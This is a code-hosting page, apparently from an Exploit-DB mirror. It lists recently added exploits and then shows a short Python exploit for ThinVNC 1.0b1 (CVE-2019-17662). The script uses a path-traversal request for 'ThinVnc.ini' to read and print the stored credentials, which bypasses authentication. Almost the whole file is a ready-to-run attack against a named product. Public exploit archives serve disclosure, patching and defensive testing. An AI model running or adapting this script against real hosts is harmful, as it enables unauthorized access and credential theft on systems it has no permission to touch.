6d83c21135
8 changes to exploits/shellcodes BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Serive Path Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Serive Path ThinVNC 1.0b1 - Authentication Bypass Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting Restaurant Management System 1.0 - Remote Code Execution
39 lines
No EOL
1,013 B
Python
Executable file
39 lines
No EOL
1,013 B
Python
Executable file
# Exploit Title: ThinVNC 1.0b1 - Authentication Bypass
|
|
# Date: 2019-10-17
|
|
# Exploit Author: Nikhith Tumamlapalli
|
|
# Contributor WarMarX
|
|
# Vendor Homepage: https://sourceforge.net/projects/thinvnc/
|
|
# Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download
|
|
# Version: 1.0b1
|
|
# Tested on: Windows All Platforms
|
|
# CVE : CVE-2019-17662
|
|
|
|
# Description:
|
|
# Authentication Bypass via Arbitrary File Read
|
|
|
|
#!/usr/bin/python3
|
|
|
|
import sys
|
|
import os
|
|
import requests
|
|
|
|
def exploit(host,port):
|
|
url = "http://" + host +":"+port+"/xyz/../../ThinVnc.ini"
|
|
r = requests.get(url)
|
|
body = r.text
|
|
print(body.splitlines()[2])
|
|
print(body.splitlines()[3])
|
|
|
|
|
|
|
|
def main():
|
|
if(len(sys.argv)!=3):
|
|
print("Usage:\n{} <host> <port>\n".format(sys.argv[0]))
|
|
print("Example:\n{} 192.168.0.10 5888")
|
|
else:
|
|
port = sys.argv[2]
|
|
host = sys.argv[1]
|
|
exploit(host,port)
|
|
|
|
if __name__ == '__main__':
|
|
main() |